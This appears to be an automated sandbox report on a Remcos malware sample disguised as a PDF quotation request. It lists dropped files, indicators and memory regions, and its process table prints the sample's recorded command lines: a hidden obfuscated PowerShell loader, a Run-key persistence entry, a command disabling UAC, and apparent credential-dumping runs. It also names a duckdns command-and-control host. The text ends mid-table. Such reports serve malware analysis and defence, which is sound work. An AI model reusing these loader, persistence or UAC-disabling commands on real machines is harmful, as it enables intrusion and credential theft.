Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
RFQ24060084#U00b7pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\nsDialogs.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xc741b813, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsstcjge.bga.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wutuq30z.pqy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv1A81.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv322F.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Farvebaandsomskifteren.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Montanes176.opt
|
Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Wafery.unt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\barsel.pul
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\migraines.sla
|
PGP symmetric key encrypted data - Plaintext or unencrypted data
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\tegnmssig.bra
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\tradionsbevarende.unp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\kilns\Unobtainably\Simens.Ice
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 18 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe
|
"C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
"C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ
/d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle
minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
}a458386d9.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gp%
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.usercontent.google.com/hQ
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/json.gphy
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://www.imvu.coma
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://geoplugin.net/json.gplr
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpC
|
unknown
|
||
|
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
|
https://drive.google.com/Y
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod-C:
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2-C:
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
217.76.50.73
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
drive.google.com
|
142.250.186.110
|
||
|
drive.usercontent.google.com
|
216.58.206.65
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
217.76.50.73
|
a458386d9.duckdns.org
|
Sweden
|
|
|
|
142.250.186.110
|
drive.google.com
|
United States
|
||
|
216.58.206.65
|
drive.usercontent.google.com
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
|
|
|
HKEY_CURRENT_USER\Toponymist
|
Berufsverbots
|
||
|
HKEY_CURRENT_USER\Environment
|
Stableres
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Preoccupant
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
6120000
|
heap
|
page read and write
|
|
|
|
60FB000
|
heap
|
page read and write
|
|
|
|
BF76000
|
direct allocation
|
page execute and read and write
|
|
|
|
6131000
|
heap
|
page read and write
|
|
|
|
42C000
|
unkown
|
page read and write
|
||
|
2236000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
22EFC000
|
heap
|
page read and write
|
||
|
618B000
|
heap
|
page read and write
|
||
|
3239000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
B4014FB000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
2204C000
|
stack
|
page read and write
|
||
|
1BFC1677000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
963000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C21000
|
direct allocation
|
page execute and read and write
|
||
|
96C000
|
heap
|
page read and write
|
||
|
221B000
|
heap
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
6183000
|
heap
|
page read and write
|
||
|
1BFC145B000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
6129000
|
heap
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
21DF000
|
heap
|
page read and write
|
||
|
221C000
|
heap
|
page read and write
|
||
|
6040000
|
direct allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
6486000
|
heap
|
page read and write
|
||
|
22C91000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
2F2C000
|
heap
|
page read and write
|
||
|
2090000
|
heap
|
page read and write
|
||
|
B4017FE000
|
unkown
|
page readonly
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
19E000
|
stack
|
page read and write
|
||
|
438000
|
unkown
|
page read and write
|
||
|
21FAE000
|
stack
|
page read and write
|
||
|
B40237E000
|
stack
|
page read and write
|
||
|
1BFBD230000
|
trusted library allocation
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
22CB7000
|
heap
|
page read and write
|
||
|
534000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
6A8000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
3610000
|
heap
|
page read and write
|
||
|
7B10000
|
heap
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
22CAE000
|
heap
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
2210000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
7625000
|
heap
|
page execute and read and write
|
||
|
33A0000
|
direct allocation
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
6460000
|
direct allocation
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
6098000
|
heap
|
page read and write
|
||
|
2227000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
219EE000
|
stack
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
8397000
|
trusted library allocation
|
page read and write
|
||
|
5DD000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
8DF000
|
stack
|
page read and write
|
||
|
798000
|
heap
|
page read and write
|
||
|
21F0000
|
heap
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
21D8000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
1BFC167A000
|
trusted library allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
2239000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
B4011FE000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
6176000
|
heap
|
page read and write
|
||
|
213F000
|
stack
|
page read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
26F2000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
91F000
|
stack
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
7B00000
|
direct allocation
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
22CA0000
|
heap
|
page read and write
|
||
|
2239000
|
heap
|
page read and write
|
||
|
22A6C000
|
unclassified section
|
page execute and read and write
|
||
|
34BD000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
2210000
|
heap
|
page read and write
|
||
|
3606000
|
remote allocation
|
page execute and read and write
|
||
|
22D5A000
|
heap
|
page read and write
|
||
|
2239000
|
heap
|
page read and write
|
||
|
22E08000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
267E000
|
stack
|
page read and write
|
||
|
8A00000
|
trusted library allocation
|
page read and write
|
||
|
CBD000
|
stack
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
224A000
|
heap
|
page read and write
|
||
|
2218000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
21D5000
|
heap
|
page read and write
|
||
|
3670000
|
heap
|
page readonly
|
||
|
221D000
|
heap
|
page read and write
|
||
|
2244000
|
heap
|
page read and write
|
||
|
224F000
|
heap
|
page read and write
|
||
|
2266000
|
heap
|
page read and write
|
||
|
22CE3000
|
heap
|
page read and write
|
||
|
612A000
|
heap
|
page read and write
|
||
|
22C91000
|
heap
|
page read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
22F40000
|
heap
|
page read and write
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
7B20000
|
heap
|
page read and write
|
||
|
6F8000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
22D8B000
|
heap
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
550000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
219F000
|
stack
|
page read and write
|
||
|
22CAE000
|
heap
|
page read and write
|
||
|
B40092B000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
B400FFE000
|
unkown
|
page readonly
|
||
|
408000
|
unkown
|
page readonly
|
||
|
544000
|
heap
|
page read and write
|
||
|
1BFBBE97000
|
heap
|
page read and write
|
||
|
4006000
|
remote allocation
|
page execute and read and write
|
||
|
1BFC1600000
|
trusted library allocation
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
89C0000
|
trusted library allocation
|
page read and write
|
||
|
6020000
|
heap
|
page read and write
|
||
|
4A06000
|
remote allocation
|
page execute and read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
2220000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
221F000
|
heap
|
page read and write
|
||
|
96C000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
1BFBBE29000
|
heap
|
page read and write
|
||
|
21E6000
|
heap
|
page read and write
|
||
|
21F3000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
6184000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
3600000
|
trusted library allocation
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
1BFC1660000
|
remote allocation
|
page read and write
|
||
|
1BFBBE5B000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
2258000
|
heap
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
B4013FE000
|
unkown
|
page readonly
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
22D34000
|
heap
|
page read and write
|
||
|
A0A000
|
heap
|
page read and write
|
||
|
2219000
|
heap
|
page read and write
|
||
|
4EE000
|
stack
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
3272000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
1BFC12D1000
|
trusted library allocation
|
page read and write
|
||
|
221C000
|
heap
|
page read and write
|
||
|
22CCF000
|
heap
|
page read and write
|
||
|
22CE9000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
6183000
|
heap
|
page read and write
|
||
|
6189000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
2225000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
223CE000
|
stack
|
page read and write
|
||
|
20F8000
|
heap
|
page read and write
|
||
|
22D9D000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
3660000
|
heap
|
page read and write
|
||
|
22D29000
|
heap
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
AFD000
|
stack
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
21D8000
|
heap
|
page read and write
|
||
|
508000
|
heap
|
page read and write
|
||
|
2219000
|
heap
|
page read and write
|
||
|
618B000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
5C89000
|
trusted library allocation
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
611B000
|
heap
|
page read and write
|
||
|
21DD000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
7B9E000
|
stack
|
page read and write
|
||
|
2221000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
28CF000
|
stack
|
page read and write
|
||
|
3400000
|
direct allocation
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
2219000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
33D0000
|
direct allocation
|
page read and write
|
||
|
548E000
|
trusted library allocation
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2C74000
|
heap
|
page read and write
|
||
|
2E0F000
|
heap
|
page read and write
|
||
|
54E000
|
stack
|
page read and write
|
||
|
21D9000
|
heap
|
page read and write
|
||
|
223E000
|
heap
|
page read and write
|
||
|
532000
|
heap
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
2244000
|
heap
|
page read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
193000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
22F91000
|
heap
|
page read and write
|
||
|
21E6000
|
heap
|
page read and write
|
||
|
1BFBBCE0000
|
heap
|
page read and write
|
||
|
21F70000
|
remote allocation
|
page read and write
|
||
|
21C80000
|
direct allocation
|
page read and write
|
||
|
262E000
|
stack
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
21F0000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
21FEF000
|
stack
|
page read and write
|
||
|
3530000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
1BFC150A000
|
heap
|
page read and write
|
||
|
6178000
|
heap
|
page read and write
|
||
|
1BFBBE3F000
|
heap
|
page read and write
|
||
|
21F4000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
22F0C000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
9DF000
|
stack
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
1BFBC71A000
|
heap
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
6185000
|
heap
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
891E000
|
stack
|
page read and write
|
||
|
303F000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
2231000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
22A4000
|
heap
|
page read and write
|
||
|
3550000
|
direct allocation
|
page read and write
|
||
|
1BFC12B0000
|
trusted library allocation
|
page read and write
|
||
|
3518000
|
heap
|
page read and write
|
||
|
1BFC1390000
|
trusted library allocation
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
8EC0000
|
trusted library allocation
|
page read and write
|
||
|
91F000
|
stack
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
B401A7E000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
6DE000
|
stack
|
page read and write
|
||
|
6070000
|
direct allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
6470000
|
direct allocation
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
2210000
|
heap
|
page read and write
|
||
|
1BFBD201000
|
trusted library allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
61E000
|
stack
|
page read and write
|
||
|
B4018FB000
|
stack
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
3275000
|
heap
|
page read and write
|
||
|
4EBE000
|
stack
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
2229000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
6185000
|
heap
|
page read and write
|
||
|
22D11000
|
heap
|
page read and write
|
||
|
220F000
|
heap
|
page read and write
|
||
|
2235000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
7680000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
9776000
|
direct allocation
|
page execute and read and write
|
||
|
2E0A000
|
heap
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
2BCF000
|
stack
|
page read and write
|
||
|
A4A000
|
heap
|
page read and write
|
||
|
6114000
|
heap
|
page read and write
|
||
|
224F000
|
heap
|
page read and write
|
||
|
B4015FE000
|
unkown
|
page readonly
|
||
|
B401EFE000
|
unkown
|
page readonly
|
||
|
7B55000
|
heap
|
page read and write
|
||
|
540E000
|
stack
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
21E1000
|
heap
|
page read and write
|
||
|
6136000
|
heap
|
page read and write
|
||
|
518000
|
heap
|
page read and write
|
||
|
7A12000
|
heap
|
page read and write
|
||
|
327D000
|
stack
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
21FC000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
65CA000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
22C97000
|
heap
|
page read and write
|
||
|
81F000
|
stack
|
page read and write
|
||
|
7C85000
|
trusted library allocation
|
page read and write
|
||
|
21E8000
|
heap
|
page read and write
|
||
|
7B87000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
22CE3000
|
heap
|
page read and write
|
||
|
21D9000
|
heap
|
page read and write
|
||
|
21D8000
|
heap
|
page read and write
|
||
|
221E000
|
heap
|
page read and write
|
||
|
221F000
|
heap
|
page read and write
|
||
|
22C90000
|
heap
|
page read and write
|
||
|
B76000
|
heap
|
page read and write
|
||
|
2220000
|
heap
|
page read and write
|
||
|
8D27000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
2530000
|
heap
|
page read and write
|
||
|
2F2E000
|
heap
|
page read and write
|
||
|
2C06000
|
remote allocation
|
page execute and read and write
|
||
|
2340000
|
trusted library allocation
|
page read and write
|
||
|
21C50000
|
direct allocation
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
B401F7E000
|
stack
|
page read and write
|
||
|
21DF000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21F9000
|
heap
|
page read and write
|
||
|
6139000
|
heap
|
page read and write
|
||
|
1BFC14C4000
|
heap
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
22CAE000
|
heap
|
page read and write
|
||
|
36B0000
|
heap
|
page read and write
|
||
|
2E17000
|
heap
|
page read and write
|
||
|
21F70000
|
remote allocation
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
8D2F000
|
heap
|
page read and write
|
||
|
6131000
|
heap
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
22899000
|
unclassified section
|
page execute and read and write
|
||
|
3438000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
B401FFE000
|
unkown
|
page readonly
|
||
|
2204000
